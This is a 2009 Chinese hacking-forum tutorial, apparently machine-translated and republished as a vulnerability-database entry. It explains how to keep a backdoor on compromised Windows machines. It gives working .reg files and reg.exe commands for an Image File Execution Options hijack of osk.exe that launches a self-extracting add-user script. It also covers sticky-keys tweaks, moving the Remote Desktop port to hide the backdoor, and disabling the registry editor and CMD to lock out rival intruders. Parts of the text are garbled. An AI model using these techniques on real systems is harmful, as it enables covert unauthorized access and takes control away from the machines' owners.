Registry and Group Policy Backdoor found letters-vulnerability warning-the black bar safety net

2009-01-06T00:00:00
ID MYHACK58:62200921830
Type myhack58
Reporter 佚名
Modified 2009-01-06T00:00:00

Description

The measured record. Interested in the binding a bit, maybe get out of the back door placement tips Quiet import regedit /s *. reg Method one, cancel sticky keys REG import with. reg Windows Registry Editor Version 5.00 [HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys] "Flags"="5 0 6" [HKEY_USERS\. DEFAULT\Control Panel\Accessibility\StickyKeys] "Flags"="5 0 6" The registry after import, the cancellation to take effect. That is, the original value 5 1 0 to 5 0 6 Second method, Start→Control Panel→accessibility options-keyboard-sticky keys-settings-uncheck“use shortcut”checkbox High contrast: Left ALT + left SHIFT + PRINT SCREEN. Mouse keys: Left ALT + left SHIFT + NUM LOCK These two still adjustable with with. exe for Backdoor use. We can't with other people with the same shift 5 times., in fact, calls the same things C:\WINDOWS\system32\utilman.exe (utility Manager)and WIN+U to call C:\WINDOWS\system32\osk.exe (on screen keyboard) C:\WINDOWS\system32\magnify.exe (magnifying glass) note: several are available Image method Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe] "debugger"="c:\WINDOWS\\System32\\wbem\ysjy.exe" with. exe with image method results better Based on the above we can make the following back door The VBS Add User script(http://bbs.77169.com/mainframe.php?tid=225157&fid=1 6 1), The 制作 成 带 密码 的 自 解压 ysjy.exe the. Advantages are as follows: 1, run the VBS with parameters//B, to prevent repetition plus users, the emergence of unnecessary dialogue window. 2, attention after use automatically removed from decompression can be achieved. Haha the script encryption shall be full reversible 3, whether he will be with. exe to replace what the back door does not affect, their own back door. Haha my friend come across, and how to trade. 4, in the cmd to disable the conditions of use, prevent others from using cmd. 5, with a password always secure a lot, and own with rar tool crack self-extracting is unsuccessful. Found it. 6, shift 5 times can't call out, out of the ordinary. Call method see above The following code is to protect their own results. in. Actually own very little protection of your own results 3 3 8 0 remote port modifications 3 3 8 0. reg Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\Wds\Repwd\Tds\Tcp] "PortNumber"=dword:00000d34 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] "PortNumber"=dword:00000d34 Necessary to change the remote port, there are a lot of people still like the invasion front. Look at 3 3 8 9 whether the shift back door. Registry disable and recovery Disable Windows Registry Editor Version 5.00 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System] "DisableRegistryTools"=dword:0 0 0 0 0 0 0 1 //the registry restore the import will not work. Recovery gpedit. msc-User Configuration - >Administrative Templates - >system of right a-prevent access to Registry editing tools-disabled Right - ---new--shortcut---- In the pop-up window“please type the location of the item”input box enter the following an example can be achieved by coherent functions %WinDir%\System32\reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 0 /f (de registry) Disable the registry of broiler chickens to improve safety a lot, the above code is measured. Online is not necessarily the line of the pass Disable CMD Windows Registry Editor Version 5.00 [HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System] "DisableCMD"=dword:0 0 0 0 0 0 0 1 //0 0 0 0 0 0 0 0 recovery Right - ---new--shortcut---- In the pop-up window“please type the location of the item”input box enter the following an example can be achieved by coherent functions without actually having the registry in the rar in the additional parameters you can modify the registry %WinDir%\System32\reg.exe add HKCU\Software\Policies\Microsoft\Windows\System DisableCMD /t REG_DWORD /d 0 /f Disable CMD to the other intruders to mention the right to high degree of difficulty quite a bit. We can integrate it, use Oh. Incidentally, here is not to provide ready-made tools, too lazy to do-it-yourself person, I can't help it. Or the phrase celebrate yourself is your best teacher.